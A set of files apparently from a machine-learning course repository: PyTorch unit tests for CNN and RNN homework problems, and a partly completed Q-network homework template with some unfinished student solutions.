assert np.allclose(b2.grad,[0,0],atol=1e-2)
assert np.allclose(W3.grad,[0,0],atol=1e-2)
assert np.allclose(b3.grad,0,atol=1e-2)
#---------------------------------------------------
def test_train():
''' (2 points) train'''
X = th.tensor([
#---------- the first image in the mini-batch (face type 1) ------
[
# the first/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
# the second/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
# the third/green channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]
],
#---------- the second image in the mini-batch (face type 2) ------
[
# the first/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
# the second/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
# the third/green channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]
]
#----------------------------------------------------
])
Y = [1.,0.]
class toy(Dataset):
def __init__(self):
self.X = th.Tensor(X)
self.Y = th.tensor(Y)
def __len__(self):
return 2
def __getitem__(self, idx):
return self.X[idx], self.Y[idx]
d = toy()
loader = th.utils.data.DataLoader(d, batch_size = 2)
n_success = 0
for _ in range(50):
# train the model
W1,b1,W2,b2,W3,b3 = train(loader,
c=3,
c1=32,
c2=64,
h=10,
w=10,
s1=3,
s2=3,
n_epoch=10)
# test the label prediction
z3= forward(X,W1,b1,W2,b2,W3,b3)
if z3[0]>z3[1]:
n_success +=1
assert n_success > 35
#---------------------------------------------------
def test_predict():
''' (2 points) predict'''
X = th.tensor([
#---------- the first image in the mini-batch (face type 1) ------
[
# the first/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
# the second/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
# the third/green channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]
],
#---------- the second image in the mini-batch (face type 2) ------
[
# the first/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
# the second/red channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]],
# the third/green channel of the image
[[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,1.,1.,1.,0.,1.,1.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,1.,0.,0.],
[0.,0.,1.,0.,0.,0.,1.,0.,0.,0.],
[0.,1.,0.,1.,0.,1.,0.,1.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,1.,0.,1.,0.,0.,0.,0.],
[0.,0.,0.,1.,1.,1.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.],
[0.,0.,0.,0.,0.,0.,0.,0.,0.,0.]]
]
#----------------------------------------------------
])
Y = [1.,0.]
class toy(Dataset):
def __init__(self):
self.X = th.Tensor(X)
self.Y = th.tensor(Y)
def __len__(self):
return 2
def __getitem__(self, idx):
return self.X[idx], self.Y[idx]
d = toy()
loader = th.utils.data.DataLoader(d, batch_size = 2)
n_success = 0
for _ in range(50):
# train the model
W1,b1,W2,b2,W3,b3 = train(loader,
c=3,
c1=32,
c2=64,
h=10,
w=10,
s1=3,
s2=3,
n_epoch=10)
# test the label prediction
y_predict= predict(X,W1,b1,W2,b2,W3,b3)
if np.allclose(y_predict,[1,0]):
n_success +=1
assert n_success > 39
```
#### File: CS-539-Machine-Learning/homework3/test3.py
```python
from problem3 import *
import sys
import math
import torch as th
from torch.utils.data import Dataset, DataLoader
'''
Unit test 3:
This file includes unit tests for problem3.py.
'''
#-------------------------------------------------------------------------
def test_python_version():
''' ----------- Problem 3 (20 points in total)---------------------'''
assert sys.version_info[0]==3 # require python 3.6 or above
assert sys.version_info[1]>=6
#---------------------------------------------------
def test_compute_zt():
''' (2 points) compute_zt'''
# 2 time sequences of 3 input features at the current time step t
# n = 2, p = 3
xt = th.tensor([
#---------- the first time sequence in the mini-batch at time step t ------
[0.2,0.4,0.6],
#---------- the second time sequence in the mini-batch at time step t ------
[0.3,0.6,0.9],
])
# hidden states of 2 neurons after the previous step t-1
# h = 2
ht_1 = th.tensor([[ 0.5,-0.4], # the hidden states for the first time sequence in the mini-batch
[-0.3, 0.6]], # the hidden states for the second time sequence in the mini-batch
requires_grad=True)
U = th.tensor([[1.,2.],
[3.,4.],
[5.,6.]],
requires_grad=True)
V = th.tensor([[1.,-2.],
[3.,-4.]],
requires_grad=True)
b_h = th.tensor([1., # bias for the first hidden state
-1.], # bias for the second hidden state
requires_grad=True)
zt = compute_zt(xt,ht_1,U,V,b_h)
# check if the values are correct
assert type(zt) == th.Tensor
assert np.allclose(zt.size(),(2,2))
zt_true= [[4.7, 5.2],
[9.1, 5.6]]
assert np.allclose(zt.data,zt_true, atol = 0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in z)
L = zt.sum()
# back propagation
L.backward()
# the gradient for ht_1
dL_dh_t_1 = [[-1., -1.],
[-1., -1.]]
dL_dU = [[0.5, 0.5],
[1.0, 1.0],
[1.5, 1.5]]
dL_dV = [[0.2, 0.2],
[0.2, 0.2]]
assert np.allclose(ht_1.grad, dL_dh_t_1, atol= 0.1)
assert np.allclose(U.grad, dL_dU, atol= 0.1)
assert np.allclose(V.grad, dL_dV, atol= 0.1)
assert np.allclose(b_h.grad, [2,2], atol= 0.1)
# test the function with random input sizes
h = np.random.randint(2,10) # number of hidden states
p = np.random.randint(2,10) # number of input features at each time step
n = np.random.randint(2,10) # number of sequences in a mini-batch
xt = th.randn(n,p)
U = th.randn(p,h)
V = th.randn(h,h)
b_h = th.randn(h)
ht_1 = th.randn(n,h)
zt = compute_zt(xt,ht_1,U,V,b_h)
assert np.allclose(zt.size(),(n,h))
#---------------------------------------------------
def test_compute_ht():
''' (2 points) compute_ht'''
# 2 time sequences in a mini-batch at the current time step t, with 3 hidden states (neurons)
# n = 2, h = 3
zt = th.tensor([
#---------- the hidden states for the first time sequence in the mini-batch at time step t ------
[0.0, 0.2, 1000.],
#---------- the hidden states for the second time sequence in the mini-batch at time step t ------
[0.5,-0.2,-1000.],
], requires_grad=True)
ht = compute_ht(zt)
assert type(ht) == th.Tensor
ht_true =[[ 0.0000, 0.1974, 1.],
[ 0.4621, -0.1974, -1.]]
assert np.allclose(ht.data,ht_true,atol=1e-2)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in h)
L = ht.sum()
# back propagation
L.backward()
# the gradient for zt
dL_dz_t = [[1.0000, 0.961, 0.],
[0.7864, 0.961, 0.]]
assert np.allclose(zt.grad, dL_dz_t, atol= 0.01)
# test the function with random input sizes
h = np.random.randint(2,10) # number of hidden states
n = np.random.randint(2,10) # number of sequences in a mini-batch
zt = th.randn(n,h)
ht = compute_ht(zt)
assert np.allclose(ht.size(),(n,h))
#---------------------------------------------------
def test_step():
''' (2 points) step'''
# 2 time sequences of 3 input features at the current time step t
# n = 2, p = 3
xt = th.tensor([
#---------- the first time sequence in the mini-batch at time step t ------
[0.2,0.4,0.6],
#---------- the second time sequence in the mini-batch at time step t ------
[0.3,0.6,0.9],
])
U = th.tensor([[ 0.1,-0.2],
[-0.3, 0.4],
[ 0.5,-0.6]],
requires_grad=True)
V = th.tensor([[0.1,-0.2],
[0.3,-0.4]],
requires_grad=True)
b_h = th.tensor([0.2,-0.2], requires_grad=True)
# hidden states of 2 neurons after the previous step t-1
# h = 2
ht_1 = th.tensor([[ 0.5,-0.4], # the hidden states for the first time sequence in the mini-batch
[-0.3, 0.6]], # the hidden states for the second time sequence in the mini-batch
requires_grad=True)
ht = step(xt,ht_1,U,V,b_h)
# check if the values are correct
assert type(ht) == th.Tensor
assert np.allclose(ht.size(),(2,2))
ht_true= [[ 0.3185, -0.3627],
[ 0.5717, -0.6291]]
assert np.allclose(ht.data,ht_true, atol = 0.1)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in ht)
L = ht.sum()
# back propagation
L.backward()
# the gradient for ht_1
dL_dh_t_1 = [[-0.0838, -0.0778],
[-0.0535, -0.0397]]
dL_dU = [[0.3817, 0.3549],
[0.7633, 0.7099],
[1.1450, 1.0648]]
dL_dV = [[0.2473, 0.2530],
[0.0445, 0.0151]]
dL_db_h = [1.5717, 1.4726]
assert np.allclose(ht_1.grad, dL_dh_t_1, atol= 0.01)
assert np.allclose(U.grad, dL_dU, atol= 0.01)
assert np.allclose(V.grad, dL_dV, atol= 0.01)
assert np.allclose(b_h.grad, dL_db_h, atol= 0.01)
# test the function with random input sizes
h = np.random.randint(2,10) # number of hidden states
p = np.random.randint(2,10) # number of input features at each time step
n = np.random.randint(2,10) # number of sequences in a mini-batch
xt = th.randn(n,p)
U = th.randn(p,h)
V = th.randn(h,h)
b_h = th.randn(h)
ht_1 = th.randn(n,h)
zt = compute_zt(xt,ht_1,U,V,b_h)
assert np.allclose(zt.size(),(n,h))
#---------------------------------------------------
def test_compute_z():
''' (2 points) compute_z'''
# 2 time sequences in a mini-batch at the current time step t, with 3 hidden states (neurons)
# n = 2, c = 3
ht = th.tensor([
#---------- the hidden states for the first time sequence in the mini-batch at the last time step t ------
[0.0, 0.2, 1.],
#---------- the hidden states for the second time sequence in the mini-batch at the last time step t ------
[0.5,-0.2,-1.],
], requires_grad=True)
W = th.tensor([1., 2., -3.], requires_grad=True)
b = th.tensor(1., requires_grad=True)
z = compute_z(ht,W,b)
assert type(z) == th.Tensor
assert np.allclose(z.size(),(2,))
assert np.allclose(z.data,[-1.6, 4.1],atol=1e-2)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in h)
L = z.sum()
# back propagation
L.backward()
# the gradient for zt
dL_dh_t = [[ 1., 2., -3.],
[ 1., 2., -3.]]
assert np.allclose(ht.grad, dL_dh_t, atol= 0.01)
# test the function with random input sizes
h = np.random.randint(2,10) # number of hidden states
n = np.random.randint(2,10) # number of sequences in a mini-batch
ht = th.randn(n,h)
W = th.randn(h)
b = th.randn(1)
z = compute_z(ht,W,b)
assert np.allclose(z.size(),(n,))
#---------------------------------------------------
def test_forward():
''' (2 points) forward'''
# 2 time sequences of 3 time steps with 2 input features at each time step
# n = 2, l=3 p = 2
x = th.tensor([
#---------- the first time sequence in the mini-batch ------
[
[1.,0.], # the first time step of the time sequence
[0.,1.], # the second time step of the time sequence
[1.,0.] # the third time step of the time sequence
],
#---------- the second time sequence in the mini-batch ------
[
[1.,0.], # the first time step of the time sequence
[1.,0.], # the second time step of the time sequence
[0.,1.] # the third time step of the time sequence
]
#------------------------------------------------------------
])
#---------------------------
# Layer 1: Recurrent layer
#---------------------------
# 4 hidden states
# h = 4 (p=2)
U = th.tensor([[ 2.1, 2.2, 2.3, 2.4],
[-1.1,-1.2,-2.3,-2.4]],
requires_grad=True)
V = th.tensor([[0.0,-1.0, 0.0, 0.0],
[0.0, 0.0,-1.0, 0.0],
[0.0, 0.0, 0.0, 1.0],
[0.0, 0.0, 0.0, 0.0]],
requires_grad=True)
b_h = th.tensor([-0.1,0.1,-0.1,0.1], requires_grad=True)
# initial hidden states of 4 neurons on 2 time sequences
ht = th.zeros(2,4, requires_grad=True)
#---------------------------
# Layer 2: Fully-connected layer
#---------------------------
W = th.tensor([-1., 1., -1., 1.], requires_grad=True)
b = th.tensor(0., requires_grad=True)
z = forward(x,ht,U,V,b_h,W,b)
assert type(z) == th.Tensor
assert np.allclose(z.size(),(2,))
assert np.allclose(z.data,[-0.0587, -0.0352], atol=1e-2)
# check if the gradients are connected correctly
# create a simple loss function (sum of all elements in h)
L = z.sum()
# back propagation
L.backward()
# the gradient for the parameters
dL_dW = [ 0.1304, 0.0279, -0.0007, 0.0078]
dL_db = 2.
dL_dU = [[-0.0752, 0.0067, 0.0502, 0.1800],
[-0.3073, 0.0629, -0.0049, 0.1941]]
dL_dV = [[-0.2416, 0.0556, 0.0563, 0.0371],
[-0.2038, 0.0488, 0.0588, -0.0052],
[-0.1922, 0.0467, 0.0589, -0.0166],
[-0.2497, 0.0576, 0.0577, 0.0375]]
dL_dbh = [-0.3825, 0.0695, 0.0453, 0.3740]
assert np.allclose(W.grad, dL_dW, atol= 0.01)
assert np.allclose(b.grad, dL_db, atol= 0.01)
assert np.allclose(U.grad, dL_dU, atol= 0.01)
assert np.allclose(V.grad, dL_dV, atol= 0.01)
assert np.allclose(b_h.grad, dL_dbh, atol= 0.01)
# test the function with random input sizes
h = np.random.randint(2,10) # number of hidden states
l = np.random.randint(2,10) # number of time steps in a sequence
p = np.random.randint(2,10) # number of input features at each time step
n = np.random.randint(2,10) # number of sequences in a mini-batch
x = th.randn(n,l,p)
ht = th.randn(n,h)
U = th.randn(p,h)
V = th.randn(h,h)
b_h = th.randn(h)
W = th.randn(h)
b = th.randn(1)
z = forward(x,ht,U,V,b_h,W,b)
assert np.allclose(z.size(),(n,))
#---------------------------------------------------
def test_compute_L():
''' (2 points) compute_L'''
# batch_size = 4
# linear logits in a mini-batch
z = th.tensor([1.,-1., -1000, 1000.], requires_grad=True)
# the labels of the mini-batch: vector of length 4 (batch_size)
y = th.Tensor([0,1,0,1])
L = compute_L(z,y)
assert type(L) == th.Tensor
assert L.requires_grad
assert np.allclose(L.detach().numpy(),0.6566,atol=1e-4)
# check if the gradients of z is connected to L correctly
L.backward() # back propagate gradient to W and b
dL_dz_true = [ 0.1828, -0.1828, 0., 0.]
assert np.allclose(z.grad,dL_dz_true, atol=0.01)
#-----------------------------------------
# batch_size = 2
# linear logits in a mini-batch
z = th.tensor([-1000., 1000.], requires_grad=True)
y = th.Tensor([1,0])
L = compute_L(z,y)
assert L.data >100
assert L.data < float('inf')
L.backward() # back propagate gradient to W and b
assert z.grad[0]<0
assert z.grad[1]>0
#---------------------------------------------------
def test_update_parameters():
''' (2 points) update_parameters'''
#---------------------------
# Layer 1: Recurrent layer
#---------------------------
# 4 hidden states
# h = 4 (p=2)
U = th.tensor([[ 2.1, 2.2, 2.3, 2.4],
[-1.1,-1.2,-2.3,-2.4]],
requires_grad=True)
V = th.tensor([[1.0,-1.0, 0.0, 0.0],
[1.0, 0.0,-1.0, 0.0],
[1.0, 0.0, 0.0, 1.0],
[1.0, 0.0, 0.0, 0.0]],
requires_grad=True)
b_h = th.tensor([-0.1,0.1,-0.1,0.1], requires_grad=True)
#---------------------------
# Layer 2: Fully-connected layer
#---------------------------
W = th.tensor([-1., 1., -1., 1.], requires_grad=True)
b = th.tensor(0., requires_grad=True)
# create a toy loss function: the sum of all elements in all parameters
L = W.sum()+ b + U.sum() + V.sum() + b_h.sum()
# back propagation to compute the gradients
L.backward()
# now the gradients for all parameters should be all-ones
# let's try updating the parameters with gradient descent
# create an optimizer for the parameters with learning rate = 0.1
optimizer = th.optim.SGD([U,V,b_h,W,b], lr=0.1)
# now perform gradient descent using SGD
update_parameters(optimizer)
# let's check the new values of the parameters
U_new = [[ 2.0, 2.1, 2.2, 2.3],
[-1.2, -1.3, -2.4, -2.5]]
V_new = [[ 0.9, -1.1, -0.1, -0.1],
[ 0.9, -0.1, -1.1, -0.1],
[ 0.9, -0.1, -0.1, 0.9],
[ 0.9, -0.1, -0.1, -0.1]]
b_h_new = [-0.2, 0.0, -0.2, 0.0]
W_new = [-1.1, 0.9, -1.1, 0.9]
assert np.allclose(U.data,U_new,atol=1e-2)
assert np.allclose(V.data,V_new,atol=1e-2)
assert np.allclose(b_h.data,b_h_new,atol=1e-2)
assert np.allclose(W.data,W_new,atol=1e-2)
assert np.allclose(b.data,-0.1,atol=1e-2)
assert np.allclose(U.grad,np.zeros((2,4)),atol=1e-2)
assert np.allclose(V.grad,np.zeros((4,4)),atol=1e-2)
assert np.allclose(b_h.grad,np.zeros(4),atol=1e-2)
assert np.allclose(W.grad,np.zeros(4),atol=1e-2)
assert np.allclose(b.grad,0,atol=1e-2)
#---------------------------------------------------
def test_train():
''' (4 points) train'''
# n = 4, l=3, p = 2
X = [
[ # instance 0
[0.,0.], # time step 0
[0.,0.], # time step 1
[0.,0.] # time step 2
],
[ # instance 1
[0.,0.],
[0.,0.],
[0.,1.]
],
[ # instance 2
[0.,0.],
[1.,0.],
[0.,0.]
],
[ # instance 3
[0.,1.],
[0.,0.],
[0.,0.]
]
]
Y = [0,0,1,1]
class toy(Dataset):
def __init__(self):
self.X = th.Tensor(X)
self.Y = th.Tensor(Y)
def __len__(self):
return 4
def __getitem__(self, idx):
return self.X[idx], self.Y[idx]
d = toy()
h=32
n=2
loader = th.utils.data.DataLoader(d, batch_size = n,shuffle=True)
U,V,b_h,W,b = train(loader,p=2,h=h,n = n,n_epoch=100)
ht = th.zeros(4,h) # initialize the hidden states as all zero
z = forward(th.Tensor(X),ht,U,V,b_h,W,b)
assert z[0] < z[2]
assert z[1] < z[2]
assert z[0] < z[3]
assert z[1] < z[3]
#---------------------------------------------------
def test_predict():
''' (2 points) predict'''
# n = 4, l=3, p = 2
X = [
[ # instance 0
[0.,0.], # time step 0
[0.,0.], # time step 1
[0.,0.] # time step 2
],
[ # instance 1
[0.,0.],
[0.,0.],
[0.,1.]
],
[ # instance 2
[0.,0.],
[1.,0.],
[0.,0.]
],
[ # instance 3
[0.,1.],
[0.,0.],
[0.,0.]
]
]
Y = [0,0,1,1]
class toy(Dataset):
def __init__(self):
self.X = th.Tensor(X)
self.Y = th.Tensor(Y)
def __len__(self):
return 4
def __getitem__(self, idx):
return self.X[idx], self.Y[idx]
d = toy()
h=32
n=2
loader = th.utils.data.DataLoader(d, batch_size = n,shuffle=True)
U,V,b_h,W,b = train(loader,p=2,h=h,n = n,n_epoch=300)
y_predict = predict(th.Tensor(X),U,V,b_h,W,b)
assert np.allclose(y_predict, Y)
```
#### File: CS-539-Machine-Learning/homework4/problem3.py
```python
import numpy as np
import torch as th
from problem2 import random_policy
# Note: please don't import any new package. You should solve this problem using only the package(s) above.
#-------------------------------------------------------------------------
'''
Problem 3: Q Network (35 points)
In this problem, you will implement a neural network (with one fully-connected layer only) to estimate Q values in a game
A list of all variables being used in this problem is provided at the end of this file.
'''
#----------------------------------------------------
'''
(Training: estimate Q values using Q network) Given a Q network with parameters (W, b) and we have a mini-batch of sampled game states S. Please compute the predicted Q values on the mini-batch of samples.
---- Inputs: --------
* S: the current states for a mini-batch of sampled game steps, a torch tensor of shape (n,p), where S[i] is the current game state in the i-th sample in the mini-batch.
* W: the weights of fully connected layer of Q network, which is used to predict the Q values of each game state, a float torch matrix of shape (p,c).
* b: the biases of fully connected layer of Q network, a float torch vector of length c.
---- Outputs: --------
* Q: the predicted Q values by the Q network on all actions for a mini-batch of game state samples, a pytorch matrix of shape (n, c). Q[i,j] represents the Q value on the j-th action for the i-th sample in the mini-batch.
---- Hints: --------
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_Q(S, W, b):
#########################################
## INSERT YOUR CODE HERE (2 points)
Q = S@W + b
#########################################
return Q
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_Q
--- OR ----
python3 -m nose -v test3.py:test_compute_Q
--- OR ----
python -m nose -v test3.py:test_compute_Q
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Training: compute Target Q values using Bellman Optimality Equation) Suppose we have a mini-batch of training samples: including the new/next games states S_new and immediate rewards R in the sampled game steps in the mini-batch. Please compute the target Q values (Qt) for the mini-batch of samples using Bellman Optimality Equation. Note the gradients cannot flow through Qt, i.e., the gradients of Qt tensor should not connect with the parameters W and b.
---- Inputs: --------
* S_new: the new/next game states for a mini-batch of sampled games steps after state transition, a torch tensor of shape (n,p). S_new[i] is the next/new game state in the i-th sample of the mini-batch.
* R: a mini-batch of the immediate rewards returned after the transition, a float vector of length (n). R[i] is the received immediate reward of the i-th sampled game step in the mini-batch.
* T: whether or not the new/next game state is a terminal state in a mini-batch of sampled games steps, a boolean torch tensor of length n. T[i]= True if S_new[i] is a terminal state in the game (where the game ends).
* W: the weights of fully connected layer of Q network, which is used to predict the Q values of each game state, a float torch matrix of shape (p,c).
* b: the biases of fully connected layer of Q network, a float torch vector of length c.
* gamma: the discount factor, a float scalar between 0 and 1.
---- Outputs: --------
* Qt: the target Q values (estimated by Bellman Optimality Equation with the target Q network) for a mini-batch of samples, a pytorch vector of length (n). Qt[i] represents the target Q value for the i-th sample in the mini-batch.
---- Hints: --------
* (Step 1) compute Q values on the new/next game states.
* (Step 2.1) If S_new[i] is a terminal state (i.e., T[i] = True), use the immediate reward R[i] as the target reward.
* (Step 2.2) Otherwise, use Bellman Optimality Equation to estimate the target Q value.
* You could re-use compute_Q() function.
* To detach the gradients of a torch tensor x, you could use x.detach(), so that gradient will not flow through x.
* To negate the boolean values in a tensor x, you could use ~x.
* To convert a boolean-valued tensor x into an integer tensor, you could use x.int().
* To compute the max value of a tensor, you could use th.max() function.
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def compute_Qt(S_new, R, T, W, b, gamma=0.95):
#########################################
## INSERT YOUR CODE HERE (5 points)
new_Q = compute_Q(S_new, W, b)
#########################################
return Qt
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_Qt
--- OR ----
python3 -m nose -v test3.py:test_compute_Qt
--- OR ----
python -m nose -v test3.py:test_compute_Qt
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Training: Loss function) Given estimated Q values by the Q network, the action chosen and the target Q values on a mini-batch of sampled game steps, please compute the mean-squared-error loss on the mini-batch of samples.
---- Inputs: --------
* Q: the predicted Q values by the Q network on all actions for a mini-batch of game state samples, a pytorch matrix of shape (n, c). Q[i,j] represents the Q value on the j-th action for the i-th sample in the mini-batch.
* A: a mini-batch of the actions chosen by the player, an integer vector of length (n).
* Qt: the target Q values (estimated by Bellman Optimality Equation with the target Q network) for a mini-batch of samples, a pytorch vector of length (n). Qt[i] represents the target Q value for the i-th sample in the mini-batch.
---- Outputs: --------
* L: the average of the least square losses on a mini-batch of training images, a torch float scalar.
---- Hints: --------
* You could use arange(n) function in Pytorch to create an index list of [0,1,2,...,n-1].
* You could use y = X[list1,list2] to select elements of matrix X into a vector. For example if list1=[1,3,5], list2=[2,4,6], then y will be a list of [ X[1,2], X[3,4], X[5,6] ].
* You could use MSELoss in Pytorch to compute the mean squared error.
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def compute_L(Q, A, Qt):
#########################################
## INSERT YOUR CODE HERE (5 points)
#########################################
return L
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_L
--- OR ----
python3 -m nose -v test3.py:test_compute_L
--- OR ----
python -m nose -v test3.py:test_compute_L
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Training: Gradient Descent) Suppose we are given a Q neural network with parameters (W, b) and we have a mini-batch of training samples (S,A,S_new,R). Suppose we have already computed the global gradients of the loss L w.r.t. the weights W and biases b on the mini-batch of samples. Assume that we have already created an optimizer for the parameter W and b. Please update the weights W and biases b using gradient descent. After the update, the global gradients of W and b should be set to all zeros.
---- Inputs: --------
* optimizer: a PyTorch optimizer (such as SGD, ADAM, RMSProp) to handle the gradient descent for all the parameters in the model (W and b).
---- Hints: --------
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def update_parameters(optimizer):
#########################################
## INSERT YOUR CODE HERE (2 points)
optimizer.step()
optimizer.zero_grad()
#########################################
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
